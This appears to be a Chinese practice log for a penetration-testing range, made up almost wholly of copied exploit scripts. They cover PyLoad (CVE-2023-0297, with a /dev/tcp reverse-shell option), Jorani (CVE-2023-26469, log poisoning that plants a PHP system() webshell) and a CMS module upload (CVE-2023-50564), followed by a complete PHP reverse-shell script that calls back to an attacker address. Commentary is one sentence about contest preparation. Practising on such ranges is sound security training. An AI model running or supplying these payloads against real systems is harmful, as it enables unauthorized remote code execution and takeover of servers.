春秋云镜刷题记录

现在越来越多决赛使用AWD赛制了，在学长的点拨下还是要抓紧学一下渗透

一些POC

CVE-2023-0297

# Exploit Title: PyLoad - Unauthenticated Remote Code Execution
# Date: 21-05-2023
# Exploit Author: Jacob Ebben
# Version: PyLoad < 0.5.0b3.dev31
# CVE: CVE-2023-0297

#!/usr/bin/env python3

import argparse
import requests
import urllib3
import string
import json
from termcolor import colored
from random import choice

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)


class POC:
    def __init__(self, target, proxy):
        self.base_url = self._get_normalized_url(target)
        self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}

        self.session = requests.Session()


    def execute_command(self, command):
        url = self.base_url + "flash/addcrypted2"
        payload = f"pyimport os;os.system(\"{command}\");f=function f2(){{}};"

        data = {
            "jk": payload,
            "packages": self._random_string(8),
            "crypted": self._random_string(8),
            "passwords": self._random_string(8),
        }

        response = requests.post(url, data=data, proxies=self.proxies)


    def _random_string(self, length=16):
        return ''.join(choice(f"{string.ascii_letters}") for i in range(length))

    def _get_normalized_url(self, url):
        if url[-1] != '/':
            url += '/'
        if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
            url = "http://" + url
        return url

    def _get_proxies(self, target_url, proxy_url):
        return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}

    def _get_url_protocol(self, url):
        if url[0:8].lower() == 'https://':
            return 'https'
        return 'http'

def main():
    parser = argparse.ArgumentParser(description="PyLoad - Unauthenticated Remote Code Execution")

    parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1:8000/\" or \"https://pyload.example.xyz/py/\")"),
    parser.add_argument('-c','--command', default=None, type=str, help='bash command to execute for single command mode (Default: Disabled)'),
    parser.add_argument('-I','--atk-ip', default=None, type=str, help='ip address for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-P','--atk-port', default=None, type=str, help='port for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-x','--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')


    args = parser.parse_args()

    exploit = POC(args.target, args.proxy)

    if args.atk_ip and args.atk_port:
        print_message('Running reverse shell. Check your listener!', "SUCCESS")
        reverse_shell = f"/bin/bash -c 'exec /bin/bash -i &>/dev/tcp/{args.atk_ip}/{args.atk_port} <&1'"
        exploit.execute_command(reverse_shell)
    elif args.command:
        print_message(f'Running your command: "{args.command}"!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        exploit.execute_command(args.command)
    else:
        print_message('Please enter your command below!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        while True:
            command = input(colored('>> ', 'green'))
            if command in {'q','exit','quit','exit()','quit()'}:
                exit()
            exploit.execute_command(command)

if __name__ == "__main__":
    main()

CVE-2023-26469

"""
vulnerability covered by CVE-2023-26469
"""
import readline
import requests
import datetime
import sys
import re
import base64
import random
import string
 
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
 
msg = lambda x,y="\n":print(f'\x1b[92m[+]\x1b[0m {x}', end=y)
err = lambda x,y="\n":print(f'\x1b[91m[x]\x1b[0m {x}', end=y)
log = lambda x,y="\n":print(f'\x1b[93m[?]\x1b[0m {x}', end=y)
 
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
 
URLS = {
	'login' : '/session/login',
	'view'	: '/pages/view/',
}
 
alphabet = string.ascii_uppercase
HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))
 
BypassRedirect = {
	'X-REQUESTED-WITH'	: 'XMLHttpRequest',
	HEADER_NAME		: ""
}
 
INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term
 
u = lambda x,y: x + URLS[y]
 
POISON_PAYLOAD		= "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
PATH_TRAV_PAYLOAD	= "../../application/logs"
 
if __name__ == '__main__':
	print("""
	/!\\ Do not use this if you are not authorized to /!\\
		""")
	log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n")
 
	if(len(sys.argv) == 1):
		err(f"Usage: {sys.argv[0]} <url>")
		exit(0)
 
	log(f"Header used for exploit: {HEADER_NAME}")	
 
 
	t = sys.argv[1]
 
	s = requests.Session()
	log("Requesting session cookie")
	res = s.get(u(t,"login"), verify = False)
 
	C = s.cookies.get_dict()
 
	Date = datetime.date.today()
	log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"
 
	csrf_token = re.findall(CSRF_PATTERN, res.text)[0] 
	log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")
	log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")
	msg(f"Recoveredd CSRF Token: {csrf_token}")
 
	data = {
		"csrf_test_jorani"	: csrf_token,
		"last_page"			: "session/login",
		"language"			: PATH_TRAV_PAYLOAD,
		"login"				: POISON_PAYLOAD,
		"CipheredValue"		: "DummyPassword"
	}
 
	s.post(u(t,"login"), data=data)
 
	log(f"Accessing log file: {log_file_name}")
 
	exp_page = t + URLS['view'] + log_file_name
 
	### Shell
	cmd = ""
	while True:
		cmd = input(INPUT)
		if(cmd in ['x', 'exit', 'quit']):
			break
		elif(cmd == ""):
			continue
		else:
			BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")
			res = s.get(exp_page, headers=BypassRedirect)
			cmdRes = re.findall(CMD_PATTERN, res.text)
			try:
				print(cmdRes[0])
			except:
				print(res.text)
				err("Wow, there was a problem, are you sure of the URL ??")
				err('exiting..')
				exit(0)

CVE-2023-50564

#Replace <hostname>
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://<hostname>/login.php"
upload_url = "http://<hostname>/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "<password>","<username>": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://<url>/data/modules/payload/shell.php"

rce=requests.get(rce_url)

print(rce.text)

shell.php -> shell.zip

# Add <your_ip> and <port> (EoF)
<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = 'sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $fstat = fstat($input);
        $size = $fstat['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();

            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS

                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }

                    // ----- WORK BEGIN -----
                    $status = proc_get_status($process);
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
                    do {
						$status = proc_get_status($process);
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
                        }                                                                    // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------

                fclose($socket);
            }
            // ------ SOCKET END ------

        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('<your_ip>', <port>);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>